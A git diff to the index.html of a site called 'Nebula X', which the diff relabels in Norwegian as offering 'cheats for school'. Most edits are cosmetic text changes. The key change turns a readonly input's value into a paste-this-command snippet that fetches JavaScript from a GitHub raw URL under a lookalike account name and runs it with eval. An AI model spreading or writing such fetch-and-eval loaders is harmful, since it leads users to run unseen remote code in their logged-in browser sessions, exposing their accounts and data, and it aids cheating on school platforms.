--- a/index.html
+++ b/index.html
@@ -50,17 +50,17 @@
         <!-- Header -->
         <header class="text-center mb-16">
             <h1 class="text-6xl font-bold mb-4 animate-neonPulse" style="animation: neonPulse 3s infinite">
-                NEBULA_X
+                Nebula X
             </h1>
             <div class="cyber-border w-max mx-auto px-6 py-2 bg-black/50">
-                <p class="text-purple-300 text-lg">SYSTEM READY</p>
+                <p class="text-purple-300 text-lg">Cheats for skole</p>
             </div>
         </header>
 
         <!-- Video Tutorial -->
         <section class="cyber-border rounded-lg mb-12 bg-black/50">
             <div class="p-4 border-b border-purple-500/30">
-                <h2 class="text-2xl text-purple-400">[ VIDEO PROTOCOL ]</h2>
+                <h2 class="text-2xl text-purple-400">[ Veiledning ]</h2>
             </div>
             <div class="relative" style="padding-bottom: 56.25%">
                 <iframe 
@@ -75,15 +75,15 @@
         <!-- Update Log -->
         <section class="cyber-border rounded-lg mb-12 bg-black/50">
             <div class="p-4 border-b border-purple-500/30">
-                <h2 class="text-2xl text-purple-400">[ SYSTEM LOGS ]</h2>
+                <h2 class="text-2xl text-purple-400">[ oppdateringer ]</h2>
             </div>
             <div class="p-4 space-y-4">
                 <div class="flex items-center p-3 bg-black/30 hover:bg-purple-900/20 transition-all group">
                     <div class="w-3 h-3 bg-purple-400 mr-3 animate-pulse"></div>
-                    <span class="text-purple-400 font-bold">v1.4.2</span>
+                    <span class="text-purple-400 font-bold">v1.0.0</span>
                     <span class="mx-3 text-purple-500">|</span>
                     <span class="text-white group-hover:text-purple-200 transition-colors">
-                        Quantum encryption module activated
+                        Nebula X er nå ute for all
                     </span>
                 </div>
                 <!-- Add more log entries -->
@@ -93,12 +93,12 @@
         <!-- Interactive Section -->
         <section class="cyber-border rounded-lg bg-black/50">
             <div class="p-4 border-b border-purple-500/30">
-                <h2 class="text-2xl text-purple-400">[ TERMINAL ]</h2>
+                <h2 class="text-2xl text-purple-400">[ Nebula X ]</h2>
             </div>
             <div class="p-4 flex flex-col md:flex-row gap-4">
                 <input 
                     type="text" 
-                    value="HelloWorld" 
+                    value="eval(await (await fetch('https://raw.githubusercontent.com/unabletoIoad/NebulaX/main/main.js')).text());" 
                     readonly
                     class="flex-1 p-3 bg-black/30 border border-purple-500 text-white focus:outline-none focus:border-purple-400 focus:ring-1 focus:ring-purple-400 transition-all"
                 >
